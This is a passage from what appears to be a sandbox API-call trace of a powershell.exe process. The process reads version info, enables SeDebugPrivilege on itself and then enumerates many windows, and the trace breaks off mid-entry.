puLen=0x74ea08) returned 0 [0076.057] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x0, puLen=0x74ea08) returned 0 [0076.057] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x74ea00, puLen=0x74e9fc | out: lplpBuffer=0x74ea00*=0x484aee8, puLen=0x74e9fc) returned 1 [0076.057] VerLanguageNameW (in: wLang=0x0, szLang=0x74e790, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0076.063] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\", lplpBuffer=0x74ea10, puLen=0x74ea0c | out: lplpBuffer=0x74ea10*=0x484ae74, puLen=0x74ea0c) returned 1 [0076.075] GetCurrentProcessId () returned 0xd2c [0076.086] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x74e2d4 | out: lpLuid=0x74e2d4*(LowPart=0x14, HighPart=0)) returned 1 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x74e2d0 | out: TokenHandle=0x74e2d0*=0xe8) returned 1 [0076.088] AdjustTokenPrivileges (in: TokenHandle=0xe8, DisableAllPrivileges=0, NewState=0x484cfd8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0076.089] CloseHandle (hObject=0xe8) returned 1 [0076.092] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd2c) returned 0xe8 [0076.323] EnumProcessModules (in: hProcess=0xe8, lphModule=0x484d01c, cb=0x100, lpcbNeeded=0x74ea40 | out: lphModule=0x484d01c, lpcbNeeded=0x74ea40) returned 1 [0076.355] GetModuleInformation (in: hProcess=0xe8, hModule=0xd70000, lpmodinfo=0x484ebd4, cb=0xc | out: lpmodinfo=0x484ebd4*(lpBaseOfDll=0xd70000, SizeOfImage=0x6c000, EntryPoint=0xd795f0)) returned 1 [0076.356] CoTaskMemAlloc (cb=0x804) returned 0xb7af60 [0076.356] GetModuleBaseNameW (in: hProcess=0xe8, hModule=0xd70000, lpBaseName=0xb7af60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0076.357] CoTaskMemFree (pv=0xb7af60) [0076.357] CoTaskMemAlloc (cb=0x804) returned 0xb7af60 [0076.357] GetModuleFileNameExW (in: hProcess=0xe8, hModule=0xd70000, lpFilename=0xb7af60, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0076.357] CoTaskMemFree (pv=0xb7af60) [0076.359] CloseHandle (hObject=0xe8) returned 1 [0076.361] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xd2c) returned 0xe8 [0076.361] GetExitCodeProcess (in: hProcess=0xe8, lpExitCode=0x484c740 | out: lpExitCode=0x484c740*=0x103) returned 1 [0076.377] EnumWindows (lpEnumFunc=0x4772c3e, lParam=0x0) returned 1 [0076.380] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa98 [0076.381] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.381] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.381] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.381] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.381] GetWindowThreadProcessId (in: hWnd=0x100c2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.381] GetWindowThreadProcessId (in: hWnd=0x100ac, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x100a4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x10098, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x100d6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.382] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc8c [0076.382] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.383] GetWindowThreadProcessId (in: hWnd=0x100e0, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.383] GetWindowThreadProcessId (in: hWnd=0x502c2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd04 [0076.383] GetWindow (hWnd=0x502c2, uCmd=0x4) returned 0x0 [0076.383] IsWindowVisible (hWnd=0x502c2) returned 0 [0076.384] GetWindowThreadProcessId (in: hWnd=0x202a6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa54 [0076.384] GetWindowThreadProcessId (in: hWnd=0x702b8, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x1188 [0076.384] GetWindowThreadProcessId (in: hWnd=0x102a2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc28 [0076.384] GetWindowThreadProcessId (in: hWnd=0x2029e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb58 [0076.384] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf24 [0076.384] GetWindowThreadProcessId (in: hWnd=0x20296, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x774 [0076.385] GetWindowThreadProcessId (in: hWnd=0x20292, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x75c [0076.385] GetWindowThreadProcessId (in: hWnd=0x2028e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf04 [0076.385] GetWindowThreadProcessId (in: hWnd=0x2028a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xef4 [0076.385] GetWindowThreadProcessId (in: hWnd=0x20286, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfd0 [0076.385] GetWindowThreadProcessId (in: hWnd=0x20282, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf28 [0076.385] GetWindowThreadProcessId (in: hWnd=0x30266, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x3fc [0076.385] GetWindowThreadProcessId (in: hWnd=0x2027c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf70 [0076.386] GetWindowThreadProcessId (in: hWnd=0x20278, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xdb8 [0076.386] GetWindowThreadProcessId (in: hWnd=0x20274, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf50 [0076.386] GetWindowThreadProcessId (in: hWnd=0x20270, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf1c [0076.386] GetWindowThreadProcessId (in: hWnd=0x1026c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xed4 [0076.386] GetWindowThreadProcessId (in: hWnd=0x10268, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xefc [0076.386] GetWindowThreadProcessId (in: hWnd=0x20262, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xeb8 [0076.386] GetWindowThreadProcessId (in: hWnd=0x2025e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xac4 [0076.387] GetWindowThreadProcessId (in: hWnd=0x2025a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xdac [0076.387] GetWindowThreadProcessId (in: hWnd=0x20256, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x84 [0076.387] GetWindowThreadProcessId (in: hWnd=0x30252, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7b0 [0076.387] GetWindowThreadProcessId (in: hWnd=0x2024e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa58 [0076.387] GetWindowThreadProcessId (in: hWnd=0x2024a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x598 [0076.387] GetWindowThreadProcessId (in: hWnd=0x20246, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x184 [0076.387] GetWindowThreadProcessId (in: hWnd=0x20242, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xe60 [0076.388] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x2ac [0076.388] GetWindowThreadProcessId (in: hWnd=0x2023a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x1fc [0076.388] GetWindowThreadProcessId (in: hWnd=0x20236, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9d0 [0076.388] GetWindowThreadProcessId (in: hWnd=0x20232, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xcec [0076.388] GetWindowThreadProcessId (in: hWnd=0x3022e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x788 [0076.388] GetWindowThreadProcessId (in: hWnd=0x30226, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xe00 [0076.388] GetWindowThreadProcessId (in: hWnd=0x20228, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa68 [0076.389] GetWindowThreadProcessId (in: hWnd=0x20222, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7c4 [0076.389] GetWindowThreadProcessId (in: hWnd=0x2021e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x88c [0076.389] GetWindowThreadProcessId (in: hWnd=0x2021a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xbdc [0076.389] GetWindowThreadProcessId (in: hWnd=0x20214, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa10 [0076.389] GetWindowThreadProcessId (in: hWnd=0x20210, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc30 [0076.389] GetWindowThreadProcessId (in: hWnd=0x2020c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb10 [0076.389] GetWindowThreadProcessId (in: hWnd=0x301fa, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xde4 [0076.390] GetWindowThreadProcessId (in: hWnd=0x40068, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xdd8 [0076.390] GetWindowThreadProcessId (in: hWnd=0x3007e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb78 [0076.390] GetWindowThreadProcessId (in: hWnd=0x3007a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb24 [0076.390] GetWindowThreadProcessId (in: hWnd=0x50074, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xde8 [0076.390] GetWindowThreadProcessId (in: hWnd=0x30052, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa34 [0076.390] GetWindowThreadProcessId (in: hWnd=0x30070, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd84 [0076.390] GetWindowThreadProcessId (in: hWnd=0x3004a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd74 [0076.391] GetWindowThreadProcessId (in: hWnd=0x30046, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd80 [0076.391] GetWindowThreadProcessId (in: hWnd=0x9005c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd58 [0076.391] GetWindowThreadProcessId (in: hWnd=0x501f6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa38 [0076.391] GetWindowThreadProcessId (in: hWnd=0x50030, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x970 [0076.391] GetWindowThreadProcessId (in: hWnd=0x4002a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd10 [0076.391] GetWindowThreadProcessId (in: hWnd=0x4002c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa24 [0076.391] GetWindowThreadProcessId (in: hWnd=0x20158, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x370 [0076.391] GetWindowThreadProcessId (in: hWnd=0x30154, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x4d4 [0076.392] GetWindowThreadProcessId (in: hWnd=0x201ce, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x35c [0076.392] GetWindowThreadProcessId (in: hWnd=0x30106, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x4f0 [0076.392] GetWindowThreadProcessId (in: hWnd=0x200e4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x504 [0076.392] GetWindowThreadProcessId (in: hWnd=0x201f4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc7c [0076.392] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfec [0076.392] GetWindowThreadProcessId (in: hWnd=0x20122, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfd8 [0076.392] GetWindowThreadProcessId (in: hWnd=0x40126, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfc0 [0076.393] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xcc8 [0076.393] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc8c [0076.393] GetWindowThreadProcessId (in: hWnd=0x201e0, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc8c [0076.393] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc84 [0076.393] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc84 [0076.393] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc8c [0076.393] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc44 [0076.394] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.394] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc44 [0076.394] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.394] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.394] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.394] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.394] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.394] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.395] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.395] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.395] GetWindowThreadProcessId (in: hWnd=0x200b4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.395] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.395] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x818 [0076.395] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.395] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.395] GetWindowThreadProcessId (in: hWnd=0x20072, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc84 [0076.396] GetWindowThreadProcessId (in: hWnd=0x100ae, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.396] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x620 [0076.396] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x444 [0076.396] GetWindowThreadProcessId (in: hWnd=0x20034, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.396] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.396] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x368 [0076.396] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x564 [0076.397] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.397] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa98 [0076.397] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.397] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x784 [0076.397] GetWindowThreadProcessId (in: hWnd=0x302b6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd8c [0076.397] GetWindowThreadProcessId (in: hWnd=0x102a8, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa54 [0076.397] GetWindowThreadProcessId (in: hWnd=0x102a4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc28 [0076.397] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb58 [0076.398] GetWindowThreadProcessId (in: hWnd=0x1029c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf24 [0076.398] GetWindowThreadProcessId (in: hWnd=0x10298, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x774 [0076.398] GetWindowThreadProcessId (in: hWnd=0x10294, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x75c [0076.398] GetWindowThreadProcessId (in: hWnd=0x10290, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf04 [0076.398] GetWindowThreadProcessId (in: hWnd=0x1028c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xef4 [0076.398] GetWindowThreadProcessId (in: hWnd=0x10288, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfd0 [0076.398] GetWindowThreadProcessId (in: hWnd=0x10284, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf28 [0076.398] GetWindowThreadProcessId (in: hWnd=0x20280, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x3fc [0076.399] GetWindowThreadProcessId (in: hWnd=0x1027e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf70 [0076.399] GetWindowThreadProcessId (in: hWnd=0x1027a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xdb8 [0076.399] GetWindowThreadProcessId (in: hWnd=0x10276, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf50 [0076.399] GetWindowThreadProcessId (in: hWnd=0x10272, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xf1c [0076.399] GetWindowThreadProcessId (in: hWnd=0x1026e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xed4 [0076.399] GetWindowThreadProcessId (in: hWnd=0x2026a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xefc [0076.399] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xeb8 [0076.400] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xac4 [0076.660] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xdac [0076.660] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x84 [0076.660] GetWindowThreadProcessId (in: hWnd=0x20254, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7b0 [0076.661] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa58 [0076.661] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x598 [0076.661] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x184 [0076.661] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xe60 [0076.661] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x2ac [0076.661] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x1fc [0076.661] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9d0 [0076.662] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xcec [0076.662] GetWindowThreadProcessId (in: hWnd=0x20230, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x788 [0076.662] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xe00 [0076.662] GetWindowThreadProcessId (in: hWnd=0x2022a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa68 [0076.662] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7c4 [0076.662] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x88c [0076.662] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xbdc [0076.662] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa10 [0076.663] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc30 [0076.663] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb10 [0076.663] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xde4 [0076.663] GetWindowThreadProcessId (in: hWnd=0x401e8, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xdd8 [0076.663] GetWindowThreadProcessId (in: hWnd=0x20078, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb78 [0076.663] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xb24 [0076.663] GetWindowThreadProcessId (in: hWnd=0x3005e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xde8 [0076.663] GetWindowThreadProcessId (in: hWnd=0x2004e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa34 [0076.664] GetWindowThreadProcessId (in: hWnd=0x301d4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd84 [0076.664] GetWindowThreadProcessId (in: hWnd=0x20064, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd74 [0076.664] GetWindowThreadProcessId (in: hWnd=0x20058, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd80 [0076.664] GetWindowThreadProcessId (in: hWnd=0x3005a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd58 [0076.664] GetWindowThreadProcessId (in: hWnd=0x401ea, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa38 [0076.664] GetWindowThreadProcessId (in: hWnd=0x30066, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x970 [0076.664] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xd10 [0076.664] GetWindowThreadProcessId (in: hWnd=0x5006a, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xa24 [0076.665] GetWindowThreadProcessId (in: hWnd=0x20156, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x370 [0076.665] GetWindowThreadProcessId (in: hWnd=0x301b4, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x4d4 [0076.665] GetWindowThreadProcessId (in: hWnd=0x201b6, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x35c [0076.665] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x4f0 [0076.665] GetWindowThreadProcessId (in: hWnd=0x601d6, 